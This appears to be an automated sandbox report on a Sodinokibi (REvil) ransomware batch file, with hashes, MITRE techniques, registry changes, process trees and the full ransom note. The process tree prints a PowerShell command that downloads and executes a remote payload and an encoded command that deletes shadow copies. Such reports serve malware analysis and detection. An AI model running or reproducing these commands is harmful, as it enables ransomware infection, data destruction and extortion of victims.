sodinokibi | 4ce493a2f1b9b9fe548d1aa4b4355f76c7ec0c3402da758cdca52288300b6f63

General

Target

33f14d49b75ebbcfae41baae23087024.bat
Size

215B
MD5

b8e6cda7825e3b0e91da48bf974c6f75
SHA1

c4cda1c0a376e6de07323a2b5d9ff388735dee66
SHA256

4ce493a2f1b9b9fe548d1aa4b4355f76c7ec0c3402da758cdca52288300b6f63
SHA512

3bfad04872fa35e5b1895719cfa2e5b38149c97a623526de13b22d51060831f25371b30e1155512a700ecab4ef809825cd575a2bacd4637ba5d50a86d684dd65

Score

10^/10

ransomware evasion spyware trojan sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/33f14d49b75ebbcfae41baae23087024

Extracted

Path

C:\cwea6-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension cwea6. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/14498A47A6CB5F5F 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/14498A47A6CB5F5F Warning: secondary website can be blocked, thats why first variant much better and more available. 3) If you still have problems accessing the site, you can write to us at: [email protected], indicating the external IP address, country, key gHX8a9HymwxZK/dcld+Od9VQoafo4vD9m/uv5nlJaMy03+bBjV1FLR0xuGiFzjAD H7RFXq/G6vvH7h3BpxdYG65QGJz2YBBmNVZBHdPXhFwcXKa3qmkPNkwx8EAZ6DfZ G9t+E78mHJeoc+3kBL/kIhR7p/PmKfJ9rcj+gISo9R1EKJph1f1m5FVUyM4N/S8T IfKxbWUNuBqg9Pqsu/DR+VM2wvBv2CFmt9NExrtH4I0BYQU0YndhXyh9nkifqpdu HB0enI+XPf0XE37f5IWyTHZZk7NG+LkZih6wFGwOf959tSgW+2vmq2RJ3b00vkMA P3dFnj/s8ppnUJnVHJG4pRvrTSEC0frHE1Qb59M1bsXajnHwUtP32I+SvQcEPrnB neHu8peMYxq8s5D+cIeFRHHzMXu3/LE4egkWn0pRPsBiopuavn0g7vlgnNELkNOr 9Q7s3Y12JJIjz3WWlIOz+9LCpSxsji7KGwXg26wvJ7ykG8BeCZO4ZqjOLIYxD3xZ sN52HX/CKBNKxpjXw8I7VH2fE9kmt6UZ2uUGnhXt8NK730f17URo2nocFwUk7L8i OGpRFgmTdwlO9ovU3fbQFrApbaH8/TE3VDHH54nm8Hr9mLh2yaVpFI/Tf7I1/F2l iTorPqG14vTgKQ9NP4BcoGF02GCtL+AbabbYNFUn0hJmO3uvelgFeEQUAeOz+w4O a0Ayi1rXYK5vt0+t1El8fWZGwgfZ4PgC7/skVNusarjpbti4kMgzrAXvw8TY1Chm RLwtT6emzK4L3f8H4BCsUlTDsuw/ao5dUozucSWBG64cb8IFer9uHkcEmj4f3EfS dLKUtH6jWpJVMrG7kp8g5EH0e6tvKBLrNtXX0gWHEQuoZ4J75O9lBLMWH2qbAZhd cjLlyLijiKZQYni5Rr8dFfiCwqzJHrCwFEeNzX0qBK5ILws/tAvhX/8VF+3ytXEi FpJUxU97S2TdrXK7zMISN5DU3bJb0lQpBRZWF+Zj9eSfFtEtOIN56OYWoly+INAc 0lU6xRjCe/633+j6cjH3mi9YxiZqN+e8Iw0JTxmjB6wtQs1Jm5x+bhrF+t/togjw m7oqQvwFvBRRambT5/UYjXP0EXRDH/zQ7Cw9MK5jRGJqJlBlOdBfAkEagp67K3DL D+F3ZmDkWvJW3J6bEWov8Djm9KBPRvHcSe6b9TESX+hDAKbArJXGyfGUE2/601Xd kVYhMCeA/i6fX4yn/2wB0Si4vjnGtVKedzXF8Kezm/GQruYI2tUZHE80SAmWg+NZ yJq9Dx7UU0XmCgG5hyyVy9llFdb31Aw+Hfzdv7MJ and extension cwea6 When you open our website, put the following data in the input form: Key: gHX8a9HymwxZK/dcld+Od9VQoafo4vD9m/uv5nlJaMy03+bBjV1FLR0xuGiFzjAD H7RFXq/G6vvH7h3BpxdYG65QGJz2YBBmNVZBHdPXhFwcXKa3qmkPNkwx8EAZ6DfZ G9t+E78mHJeoc+3kBL/kIhR7p/PmKfJ9rcj+gISo9R1EKJph1f1m5FVUyM4N/S8T IfKxbWUNuBqg9Pqsu/DR+VM2wvBv2CFmt9NExrtH4I0BYQU0YndhXyh9nkifqpdu HB0enI+XPf0XE37f5IWyTHZZk7NG+LkZih6wFGwOf959tSgW+2vmq2RJ3b00vkMA P3dFnj/s8ppnUJnVHJG4pRvrTSEC0frHE1Qb59M1bsXajnHwUtP32I+SvQcEPrnB neHu8peMYxq8s5D+cIeFRHHzMXu3/LE4egkWn0pRPsBiopuavn0g7vlgnNELkNOr 9Q7s3Y12JJIjz3WWlIOz+9LCpSxsji7KGwXg26wvJ7ykG8BeCZO4ZqjOLIYxD3xZ sN52HX/CKBNKxpjXw8I7VH2fE9kmt6UZ2uUGnhXt8NK730f17URo2nocFwUk7L8i OGpRFgmTdwlO9ovU3fbQFrApbaH8/TE3VDHH54nm8Hr9mLh2yaVpFI/Tf7I1/F2l iTorPqG14vTgKQ9NP4BcoGF02GCtL+AbabbYNFUn0hJmO3uvelgFeEQUAeOz+w4O a0Ayi1rXYK5vt0+t1El8fWZGwgfZ4PgC7/skVNusarjpbti4kMgzrAXvw8TY1Chm RLwtT6emzK4L3f8H4BCsUlTDsuw/ao5dUozucSWBG64cb8IFer9uHkcEmj4f3EfS dLKUtH6jWpJVMrG7kp8g5EH0e6tvKBLrNtXX0gWHEQuoZ4J75O9lBLMWH2qbAZhd cjLlyLijiKZQYni5Rr8dFfiCwqzJHrCwFEeNzX0qBK5ILws/tAvhX/8VF+3ytXEi FpJUxU97S2TdrXK7zMISN5DU3bJb0lQpBRZWF+Zj9eSfFtEtOIN56OYWoly+INAc 0lU6xRjCe/633+j6cjH3mi9YxiZqN+e8Iw0JTxmjB6wtQs1Jm5x+bhrF+t/togjw m7oqQvwFvBRRambT5/UYjXP0EXRDH/zQ7Cw9MK5jRGJqJlBlOdBfAkEagp67K3DL D+F3ZmDkWvJW3J6bEWov8Djm9KBPRvHcSe6b9TESX+hDAKbArJXGyfGUE2/601Xd kVYhMCeA/i6fX4yn/2wB0Si4vjnGtVKedzXF8Kezm/GQruYI2tUZHE80SAmWg+NZ yJq9Dx7UU0XmCgG5hyyVy9llFdb31Aw+Hfzdv7MJ ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/14498A47A6CB5F5F

http://decryptor.cc/14498A47A6CB5F5F

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1480 powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1312 wrote to memory of 1480	1312	cmd.exe	powershell.exe
PID 1480 wrote to memory of 1772	1480	powershell.exe	powershell.exe
PID 1480 wrote to memory of 1772	1480	powershell.exe	powershell.exe
PID 1480 wrote to memory of 1772	1480	powershell.exe	powershell.exe
PID 1480 wrote to memory of 1772	1480	powershell.exe	powershell.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b19000000010000001000000082218ffb91733e64136be5719f57c3a1040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be034140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d41800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	powershell.exe

Drops file in Program Files directory 26 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\NewImport.inf	powershell.exe
File opened for modification	\??\c:\program files\ResumeEdit.vsx	powershell.exe
File opened for modification	\??\c:\program files\SwitchUpdate.midi	powershell.exe
File opened for modification	\??\c:\program files\EnterRevoke.avi	powershell.exe
File opened for modification	\??\c:\program files\InitializeCompare.mpeg2	powershell.exe
File opened for modification	\??\c:\program files\LimitCopy.xlsb	powershell.exe
File opened for modification	\??\c:\program files\MoveRedo.asp	powershell.exe
File opened for modification	\??\c:\program files\WatchResize.vstx	powershell.exe
File opened for modification	\??\c:\program files\ConvertFromAdd.vsx	powershell.exe
File opened for modification	\??\c:\program files\InitializeRestart.dib	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\cwea6-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\UnregisterComplete.xht	powershell.exe
File opened for modification	\??\c:\program files\UnlockInstall.ods	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\cwea6-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\BackupCompare.eprtx	powershell.exe
File opened for modification	\??\c:\program files\ExportSkip.dotm	powershell.exe
File opened for modification	\??\c:\program files\ResumeSync.mp4v	powershell.exe
File opened for modification	\??\c:\program files\TraceSet.m4a	powershell.exe
File opened for modification	\??\c:\program files\InitializeShow.au	powershell.exe
File opened for modification	\??\c:\program files\OptimizeEdit.svg	powershell.exe
File opened for modification	\??\c:\program files\SearchBlock.vb	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\cwea6-readme.txt	powershell.exe
File created	\??\c:\program files\cwea6-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\cwea6-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\DismountDebug.xltx	powershell.exe
File opened for modification	\??\c:\program files\GetMove.ttf	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6mb3b8p48.bmp"	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe
Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeBackupPrivilege	1632	vssvc.exe
Token: SeRestorePrivilege	1632	vssvc.exe
Token: SeAuditPrivilege	1632	vssvc.exe
Token: SeTakeOwnershipPrivilege	1480	powershell.exe

Suspicious behavior: EnumeratesProcesses 77 IoCs

Processes:

powershell.exepowershell.exe

pid	process
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1772	powershell.exe
1772	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe

Blacklisted process makes network request 139 IoCs

Processes:

powershell.exe

flow	pid	process
3	1480	powershell.exe
7	1480	powershell.exe
8	1480	powershell.exe
10	1480	powershell.exe
12	1480	powershell.exe
14	1480	powershell.exe
16	1480	powershell.exe
18	1480	powershell.exe
19	1480	powershell.exe
21	1480	powershell.exe
23	1480	powershell.exe
24	1480	powershell.exe
26	1480	powershell.exe
27	1480	powershell.exe
30	1480	powershell.exe
31	1480	powershell.exe
33	1480	powershell.exe
34	1480	powershell.exe
36	1480	powershell.exe
37	1480	powershell.exe
39	1480	powershell.exe
40	1480	powershell.exe
42	1480	powershell.exe
43	1480	powershell.exe
45	1480	powershell.exe
47	1480	powershell.exe
49	1480	powershell.exe
51	1480	powershell.exe
52	1480	powershell.exe
54	1480	powershell.exe
56	1480	powershell.exe
58	1480	powershell.exe
59	1480	powershell.exe
61	1480	powershell.exe
62	1480	powershell.exe
64	1480	powershell.exe
66	1480	powershell.exe
67	1480	powershell.exe
69	1480	powershell.exe
70	1480	powershell.exe
72	1480	powershell.exe
73	1480	powershell.exe
75	1480	powershell.exe
77	1480	powershell.exe
79	1480	powershell.exe
81	1480	powershell.exe
82	1480	powershell.exe
84	1480	powershell.exe
85	1480	powershell.exe
87	1480	powershell.exe
88	1480	powershell.exe
90	1480	powershell.exe
91	1480	powershell.exe
93	1480	powershell.exe
95	1480	powershell.exe
96	1480	powershell.exe
98	1480	powershell.exe
99	1480	powershell.exe
101	1480	powershell.exe
103	1480	powershell.exe
104	1480	powershell.exe
106	1480	powershell.exe
108	1480	powershell.exe
110	1480	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\33f14d49b75ebbcfae41baae23087024.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/33f14d49b75ebbcfae41baae23087024');Invoke-TOSTCDSD;Start-Sleep -s 10000"
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Modifies system certificate store
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1772

C:\Windows\system32\vssvc.exe
